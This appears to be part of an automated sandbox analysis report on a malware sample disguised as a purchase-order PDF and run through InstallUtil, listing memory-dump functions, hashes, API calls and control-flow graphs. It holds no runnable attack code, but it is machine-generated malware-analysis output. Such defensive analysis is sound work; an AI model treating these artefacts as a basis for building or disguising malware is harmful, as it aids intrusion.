                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7d37ab5ff021c3200f1f429d1cba1a452e04f420e10669422cbb47667f4ff75
                                            • Instruction ID: b4f1d87e15e089f84bbfa45fe932e683f0ee89e8705f641d889c8d38eb5f3160
                                            • Opcode Fuzzy Hash: a7d37ab5ff021c3200f1f429d1cba1a452e04f420e10669422cbb47667f4ff75
                                            • Instruction Fuzzy Hash: 374102B0D103099FDB14CFA9D888B9DBBF1BB4A314F209029E459BB350D7B49885CF45
                                            Function 05EE05DD Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 827685cac688ef6933bb8da0951ecd515999bd4b90e05cb5dca1baadf9def619
                                            • Instruction ID: 9a68145f1b19366b236d7bd1953767fb7bef83c253ca10465ecde398b183421c
                                            • Opcode Fuzzy Hash: 827685cac688ef6933bb8da0951ecd515999bd4b90e05cb5dca1baadf9def619
                                            • Instruction Fuzzy Hash: 224101B0D103498FEB14CFA9D888BDDBBF1BB4A304F20A029E455BB250D7B49889CF45
                                            Function 05EE1B20 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9377e00629a25640bec920921a5d5392f23ccefe35cb853d869dc02b3cb1d40
                                            • Instruction ID: 931145cc6058f0b72e88a5d35ad3e59bccd666ea3bcffcacb96d553525d95584
                                            • Opcode Fuzzy Hash: f9377e00629a25640bec920921a5d5392f23ccefe35cb853d869dc02b3cb1d40
                                            • Instruction Fuzzy Hash: B9419870D156288BEB68CF5AC84879AFAF7BF89304F14D1A9944DA6264EB750A85CF00
                                            Function 05F5402D Relevance: .1, Instructions: 107COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 969a8270e01726b45682be05b6fc5f8451055176ee481484469b4da6d17dc622
                                            • Instruction ID: 9d1c810a4a3aef17a347e928909248cd37130c7eb24705b2d7775eb1d177e266
                                            • Opcode Fuzzy Hash: 969a8270e01726b45682be05b6fc5f8451055176ee481484469b4da6d17dc622
                                            • Instruction Fuzzy Hash: DC416E71D05A588BEB18CF6BCD4469AFAF3BFC8311F14C1B9991CAA254EB3405868F01
                                            Function 061F07D0 Relevance: .1, Instructions: 98COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b82fe04e54f8cdce3dbc9baf4d52e850e23f2c49c9fe15bd478c3aa4b459544f
                                            • Instruction ID: 0e60d2a05ea91501534823a4936568ba61970ef2d065d8922c4bb842c77b9018
                                            • Opcode Fuzzy Hash: b82fe04e54f8cdce3dbc9baf4d52e850e23f2c49c9fe15bd478c3aa4b459544f
                                            • Instruction Fuzzy Hash: D641FEB5D05258DFCB00CFA9D484AEEFBF0AB49310F14906AE815B7240C738AA45CFA4
                                            Function 061F07D8 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766207440.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_61f0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1470aeefd157a6dd60fbc521f07ead4b8a820e99e0c719c4cf095f465ad53b6a
                                            • Instruction ID: 8de8a37c1bec802b05c3bcd646ddd8862a6662ef0240eb8e9b28bff6276a9e91
                                            • Opcode Fuzzy Hash: 1470aeefd157a6dd60fbc521f07ead4b8a820e99e0c719c4cf095f465ad53b6a
                                            • Instruction Fuzzy Hash: FC41EEB5D05258DFCB00CFA9D484AEEFBF0BB49310F14942AE415B7240C738AA49CFA4
                                            Function 063A0006 Relevance: .1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9236d69f698d8779e91753fe80a67069b5ec9a3b5a6626051b07da7877c01d04
                                            • Instruction ID: b34fc2d5a6c445db5bdafeca6a8fd627403fc1aa3d43b7a5899428cde7ee350d
                                            • Opcode Fuzzy Hash: 9236d69f698d8779e91753fe80a67069b5ec9a3b5a6626051b07da7877c01d04
                                            • Instruction Fuzzy Hash: FD316F71C093549FDB69CF6ACC54399BBF7AF85200F05C4EAC488A6125D7340A86DF51
                                            Function 063A0040 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766732874.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_63a0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b38d9a4320ed0b3b8e4087a1820d6886a23b76ac55364e2378d6db40cd274516
                                            • Instruction ID: 7fdcb8452ea7785b82b0b2b3f35c48899c21e541a0d40d849424ccb9c527c51a
                                            • Opcode Fuzzy Hash: b38d9a4320ed0b3b8e4087a1820d6886a23b76ac55364e2378d6db40cd274516
                                            • Instruction Fuzzy Hash: 3731E674D056298BEB68CF6ACD447DAFAF6BF88304F04C0FA940DA6254DB704A819F81
                                            Function 0621BF50 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29a8d8cc9f6568be98b5c1fa5e8ff5d235244bc8cb84db530eca1dc08460185a
                                            • Instruction ID: 58f5080a465442cbeaaba2f04d7d8ef9a187905bea4b6ced6c4c6467186993d3
                                            • Opcode Fuzzy Hash: 29a8d8cc9f6568be98b5c1fa5e8ff5d235244bc8cb84db530eca1dc08460185a
                                            • Instruction Fuzzy Hash: 7421FEB5D142089FDB10CFA9D984AEEFBF1FB49320F10901AE819B7240C7356945CFA4
                                            Function 05EEBC18 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 60b6a9e0f753f444ca8415a94937eaee2c79f3ee888fd9d632d9cee48462c0fd
                                            • Instruction ID: 259698c179ddec75866ae60c71b43c34486204c61f36bfcb4e7af2e6b362629f
                                            • Opcode Fuzzy Hash: 60b6a9e0f753f444ca8415a94937eaee2c79f3ee888fd9d632d9cee48462c0fd
                                            • Instruction Fuzzy Hash: 1D31C871D156188BDB28CF6BC9446DEFBF7AFC9300F14D0AA984DAB214EB344A858F44
                                            Function 0621BF58 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1766300402.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e2e231c568f9c8376712e9617ec95ba0db49a7614fc2d5c0bb886d6d5617694
                                            • Instruction ID: 07c7e02761e1d29255fa94aedaf96a6d192f315c964b31eecc5d2bf6e89db25d
                                            • Opcode Fuzzy Hash: 3e2e231c568f9c8376712e9617ec95ba0db49a7614fc2d5c0bb886d6d5617694
                                            • Instruction Fuzzy Hash: D821F0B5D142089FCB14CFA9D884AEEFBF1FB49320F10901AE819B7240C735A945CFA4
                                            Function 05EEBC08 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 698c10166b41d4e12fc57fedcb3568ee41eda86409a792a6f8d581df677a953a
                                            • Instruction ID: 0993e9e3f58811ef7462f49a8d7128b2996cdb301776fbff1d7143a46add8c48
                                            • Opcode Fuzzy Hash: 698c10166b41d4e12fc57fedcb3568ee41eda86409a792a6f8d581df677a953a
                                            • Instruction Fuzzy Hash: 7411A071D156188BDB29CF6B8D406DDFAF7AFC9300F14D0BA981DAA254EB340A458F45
                                            Function 05EE1161 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765476186.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5ee0000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a255fdb8a8d73f53745e1ba622c7eb99afceaa1dccd4875d5bf5d9492f3b0a03
                                            • Instruction ID: dbfc4408b8f0d28fcfa444b9637190e8a7edf68274f20c97998212008835634b
                                            • Opcode Fuzzy Hash: a255fdb8a8d73f53745e1ba622c7eb99afceaa1dccd4875d5bf5d9492f3b0a03
                                            • Instruction Fuzzy Hash: 00013C36D14218EFDB40CFA8E844AEDFBB0FB49725F14819AD945A7310D330A955DB50
                                            Function 05F5D6E8 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765728854.0000000005F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f50000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea42f8912412a9b2b07c7595656ea16a2c4b349d6d408073d8b77dc1e59435d6
                                            • Instruction ID: e93bec33e0c953a2f28b12aec8ebeb625168e65dd8441c22e5471e0b9d061d38
                                            • Opcode Fuzzy Hash: ea42f8912412a9b2b07c7595656ea16a2c4b349d6d408073d8b77dc1e59435d6
                                            • Instruction Fuzzy Hash: 8911280A78D3C45FD2422378B81A3E76DA28DD255CF0C549583C8A1D73D51A8065D79E
                                            Function 05F275B0 Relevance: 7.9, Strings: 6, Instructions: 403COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                            • API String ID: 0-723292480
                                            • Opcode ID: 93d333f951f02e05e772b2ef85e09aa5ba3a6f7013f3a9dc542c66c44155adff
                                            • Instruction ID: 25e1be92691be67c3ffab8755e0ce2390507c319eaae027dd3e5226ad0835738
                                            • Opcode Fuzzy Hash: 93d333f951f02e05e772b2ef85e09aa5ba3a6f7013f3a9dc542c66c44155adff
                                            • Instruction Fuzzy Hash: 3CD16E76A00224DFCB05DF68C944E99BBB2FF88310F058498E509AB272DB36ED55DF90
                                            Function 05F2DFE0 Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1765592756.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5f20000_RFQ__PO_PO 24090041-PDF____PDF.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (_^q$(_^q$(_^q$(_^q
                                            • API String ID: 0-2697572114
                                            • Opcode ID: 811b717b32d615a98031abcf6d90851350ad444705d6fd6465cb3240e46046a9
                                            • Instruction ID: d5b110180b4d34405ef049bbf6eb35118a4413e72c3f5ce967a693a22549d146
                                            • Opcode Fuzzy Hash: 811b717b32d615a98031abcf6d90851350ad444705d6fd6465cb3240e46046a9
                                            • Instruction Fuzzy Hash: C571F3FAE142248FC704DF68C8955BA7FBAEF95200B684469D602DB391EA39DC41CB90

                                            Execution Graph

                                            Execution Coverage:8.7%
                                            Dynamic/Decrypted Code Coverage:83.1%
                                            Signature Coverage:0%
                                            Total number of Nodes:65
                                            Total number of Limit Nodes:9
                                            execution_graph 42185 230d030 42186 230d048 42185->42186 42187 230d0a2 42186->42187 42192 5cda48c 42186->42192 42196 5cdd697 42186->42196 42200 5cde7f8 42186->42200 42204 5cdd6a8 42186->42204 42193 5cda497 42192->42193 42195 5cde859 42193->42195 42208 5cde46c CallWindowProcW 42193->42208 42195->42195 42197 5cdd6a5 42196->42197 42198 5cda48c CallWindowProcW 42197->42198 42199 5cdd6ef 42198->42199 42199->42187 42202 5cde835 42200->42202 42203 5cde859 42202->42203 42209 5cde46c CallWindowProcW 42202->42209 42203->42203 42205 5cdd6ce 42204->42205 42206 5cda48c CallWindowProcW 42205->42206 42207 5cdd6ef 42206->42207 42207->42187 42208->42195 42209->42203 42217 2390848 42219 239084e 42217->42219 42218 239091b 42219->42218 42222 239143a 42219->42222 42228 2391330 42219->42228 42224 2391346 42222->42224 42225 2391443 42222->42225 42223 2391434 42223->42219 42224->42223 42226 239143a GlobalMemoryStatusEx 42224->42226 42233 2397038 42224->42233 42225->42219 42226->42224 42229 23912e4 42228->42229 42230 23912e6 42229->42230 42231 239143a GlobalMemoryStatusEx 42229->42231 42232 2397038 GlobalMemoryStatusEx 42229->42232 42230->42219 42231->42229 42232->42229 42234 2397042 42233->42234 42236 2397084 42234->42236 42241 5b9cad8 42234->42241 42247 5b9cae8 42234->42247 42235 2397055 42252 5b9de78 42235->42252 42256 5b9de88 42235->42256 42236->42224 42242 5b9c903 42241->42242 42243 5b9cae7 42241->42243 42242->42235 42244 5b9cd0e 42243->42244 42245 5b9d138 GlobalMemoryStatusEx 42243->42245 42246 5b9d128 GlobalMemoryStatusEx 42243->42246 42244->42235 42245->42243 42246->42243 42248 5b9cafd 42247->42248 42249 5b9cd0e 42248->42249 42250 5b9d138 GlobalMemoryStatusEx 42248->42250 42251 5b9d128 GlobalMemoryStatusEx 42248->42251 42249->42235 42250->42248 42251->42248 42255 5b9dea2 42252->42255 42253 5b9d138 GlobalMemoryStatusEx 42253->42255 42254 5b9e0e9 42254->42236 42255->42253 42255->42254 42259 5b9dea2 42256->42259 42257 5b9d138 GlobalMemoryStatusEx 42257->42259 42258 5b9e0e9 42258->42236 42259->42257 42259->42258 42210 5cdfc00 42211 5cdfc1c 42210->42211 42212 5cdfd1c 42211->42212 42213 5cdfc72 42211->42213 42214 5cda48c CallWindowProcW 42212->42214 42215 5cdfcca CallWindowProcW 42213->42215 42216 5cdfc79 42213->42216 42214->42216 42215->42216 42260 5cdd4f0 42261 5cdd558 CreateWindowExW 42260->42261 42263 5cdd614 42261->42263

                                            Executed Functions

                                            Function 02399BA0 Relevance: 3.0, Instructions: 2993COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5c2a9b3daf7159fd7f394fe56cac32c5cda1dd6ef91bca9ea8b67f660ae5f59
                                            • Instruction ID: 63621f17d6f5492d7ecff6a7c0d165d12f61134d1c79384237f63091ece3dc91
                                            • Opcode Fuzzy Hash: f5c2a9b3daf7159fd7f394fe56cac32c5cda1dd6ef91bca9ea8b67f660ae5f59
                                            • Instruction Fuzzy Hash: 58630C31D10B1A8ADB51EF68C880699F7B1FF9A300F15D79AE45877221FB70AAD4CB41
                                            Function 02399AE0 Relevance: 2.8, Instructions: 2755COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 968913d312e09dcc54f38b97f3f2e000b2f1b4b8254e3afbedfeb848ed6749a5
                                            • Instruction ID: a95cb6ed102b9bbff11cfadd87f85c24a30e492db4fc27614854ccea72e60041
                                            • Opcode Fuzzy Hash: 968913d312e09dcc54f38b97f3f2e000b2f1b4b8254e3afbedfeb848ed6749a5
                                            • Instruction Fuzzy Hash: B253EA31D10B1A8ACB51EF68C880699F7B1FF99300F15D79AE45877221FB70AAD5CB81
                                            Function 0239CD58 Relevance: 2.3, Instructions: 2296COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6ecd35df4ccafdf5b1b922cd9ac5e272505630b02a974bb8d62f547276d05f4e
                                            • Instruction ID: f67f8d56e40c5f4fcf4b5616e5bf80ddddc4a95591665fb79629e8f10ffd3ee2
                                            • Opcode Fuzzy Hash: 6ecd35df4ccafdf5b1b922cd9ac5e272505630b02a974bb8d62f547276d05f4e
                                            • Instruction Fuzzy Hash: 86332D31D107198ECB11EF68C8906ADF7B1FF99300F15D79AE459A7221EB70AAC5CB81
                                            Function 02399330 Relevance: .6, Instructions: 611COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e35ee9731850a3a3a6bcd6cd03b6219df6658675cee2e8b43e7f20412f421e0e
                                            • Instruction ID: ee88effdab9c2e039b80225e296dce9d40d3ebb9b8f8499b870f9204b24c5547
                                            • Opcode Fuzzy Hash: e35ee9731850a3a3a6bcd6cd03b6219df6658675cee2e8b43e7f20412f421e0e
                                            • Instruction Fuzzy Hash: 4C328C35A002058FDF14DFA8D584BAEBBB6EF89310F248569E909DB395DB31DC45CB90
                                            Function 02394A40 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41bb108190938c94e69860544164be681f1006855857664d753188070319f5a2
                                            • Instruction ID: c47d644933f70a5f3f910d623a05ecd0dbab738503691a84ded9f79b22e7dc11
                                            • Opcode Fuzzy Hash: 41bb108190938c94e69860544164be681f1006855857664d753188070319f5a2
                                            • Instruction Fuzzy Hash: B7B18F74E00209CFDF14CFA9D98579EBBF2AF89314F148129D919E7294EB749886CF81
                                            Function 02393E28 Relevance: .2, Instructions: 238COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e7351f5406f1dcdd95d14439fc7c7de3d1bd144f2360aa550f5a0c5b8455a656
                                            • Instruction ID: 4d30bd08a02dcceb235412f56feba37f5449045ab5fabb21f0293bc3d32b6458
                                            • Opcode Fuzzy Hash: e7351f5406f1dcdd95d14439fc7c7de3d1bd144f2360aa550f5a0c5b8455a656
                                            • Instruction Fuzzy Hash: D69140B1E003099FDF14CFA9D98579EBBF2AF89314F148129E419A7354EB749846CF81
                                            Function 02396E80 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2318 2396e80-2396ece call 2396be8 2325 2396ecf-2396eea 2318->2325 2328 2396eec-2396f05 call 23966f0 2325->2328 2329 2396f06-2396f1d 2325->2329 2329->2325 2333 2396f1f-2396f34 2329->2333 2335 2396f36-2396f39 2333->2335 2336 2396f49-2396f4c 2335->2336 2337 2396f3b call 23978c0 2335->2337 2338 2396f88-2396f8b 2336->2338 2339 2396f4e-2396f83 2336->2339 2340 2396f41-2396f44 2337->2340 2341 2396f8d-2396fa1 2338->2341 2342 2396fbe-2396fc1 2338->2342 2339->2338 2340->2336 2350 2396fa3-2396fa5 2341->2350 2351 2396fa7 2341->2351 2343 2396fc3-2396fca 2342->2343 2344 2396fd5-2396fd7 2342->2344 2346 23970a8-23970ae 2343->2346 2347 2396fd0 2343->2347 2348 2396fd9 2344->2348 2349 2396fde-2396fe1 2344->2349 2347->2344 2348->2349 2349->2335 2352 2396fe7-2396ff6 2349->2352 2353 2396faa-2396fb9 2350->2353 2351->2353 2356 2396ff8-2396ffb 2352->2356 2357 2397020-2397036 2352->2357 2353->2342 2359 2397003-239701e 2356->2359 2357->2346 2359->2356 2359->2357
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q$LR^q
                                            • API String ID: 0-4089051495
                                            • Opcode ID: 2dd486ead00008559e4b01dda4ca3b4bdace9f408be3de32187849b3c5dacb1e
                                            • Instruction ID: ed7160c931296742bd19d9243b042b7c97ece2a50a560afd8d5a49f1d2b86046
                                            • Opcode Fuzzy Hash: 2dd486ead00008559e4b01dda4ca3b4bdace9f408be3de32187849b3c5dacb1e
                                            • Instruction Fuzzy Hash: BF51D231B112099BEF25DF78C45579EB7B6EF86304F10846AE406EB390DB70E846CB91
                                            Function 05B9DCE9 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3024 5b9dce9-5b9dd03 3025 5b9dd2d-5b9dd4c call 5b9d8e8 3024->3025 3026 5b9dd05-5b9dd2c call 5b9d118 3024->3026 3032 5b9dd4e-5b9dd51 3025->3032 3033 5b9dd52-5b9ddb1 3025->3033 3040 5b9ddb3-5b9ddb6 3033->3040 3041 5b9ddb7-5b9de44 GlobalMemoryStatusEx 3033->3041 3044 5b9de4d-5b9de75 3041->3044 3045 5b9de46-5b9de4c 3041->3045 3045->3044
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1903736726.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_5b90000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cea2f5fe1b435fe9c133d96f7e4e8e82c1342f1dd8e0b70aca55ca4d571da5a4
                                            • Instruction ID: 9154505c9f8a35117a3402a83c77e920d357e59a94a7108e93a9e12bb53edd2f
                                            • Opcode Fuzzy Hash: cea2f5fe1b435fe9c133d96f7e4e8e82c1342f1dd8e0b70aca55ca4d571da5a4
                                            • Instruction Fuzzy Hash: 3441E0B2E002558FCB14DFA9D8443AEBBF5AF88310F1585AAD509E7381DB789885CBD0
                                            Function 05CDD4E4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3048 5cdd4e4-5cdd556 3050 5cdd558-5cdd55e 3048->3050 3051 5cdd561-5cdd568 3048->3051 3050->3051 3052 5cdd56a-5cdd570 3051->3052 3053 5cdd573-5cdd5ab 3051->3053 3052->3053 3054 5cdd5b3-5cdd612 CreateWindowExW 3053->3054 3055 5cdd61b-5cdd653 3054->3055 3056 5cdd614-5cdd61a 3054->3056 3060 5cdd655-5cdd658 3055->3060 3061 5cdd660 3055->3061 3056->3055 3060->3061 3062 5cdd661 3061->3062 3062->3062
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05CDD602
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1904015853.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_5cd0000_InstallUtil.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 1659c32c5d7bc692b60536feff0bdcef5ebbbb578d2a586e955eab6717786fef
                                            • Instruction ID: 2066fd107fc00a89095cb43a74906ebd88f33ecbc3c12a5af526106b93e284bf
                                            • Opcode Fuzzy Hash: 1659c32c5d7bc692b60536feff0bdcef5ebbbb578d2a586e955eab6717786fef
                                            • Instruction Fuzzy Hash: C851E1B0D003499FDB14CFA9C884ADEFFB5BF48350F64852AE919AB210D7719985CF90
                                            Function 05CDD4F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3063 5cdd4f0-5cdd556 3064 5cdd558-5cdd55e 3063->3064 3065 5cdd561-5cdd568 3063->3065 3064->3065 3066 5cdd56a-5cdd570 3065->3066 3067 5cdd573-5cdd612 CreateWindowExW 3065->3067 3066->3067 3069 5cdd61b-5cdd653 3067->3069 3070 5cdd614-5cdd61a 3067->3070 3074 5cdd655-5cdd658 3069->3074 3075 5cdd660 3069->3075 3070->3069 3074->3075 3076 5cdd661 3075->3076 3076->3076
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05CDD602
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1904015853.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_5cd0000_InstallUtil.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 8486bbd52dec6cbfa436b7e27fdaaa082a0092aa3299fa740fc8e8ecde349cab
                                            • Instruction ID: fa7b518dea00dea8aee24f26e0fd237042b2ed7b4bd2536464eda9dbc5e021f0
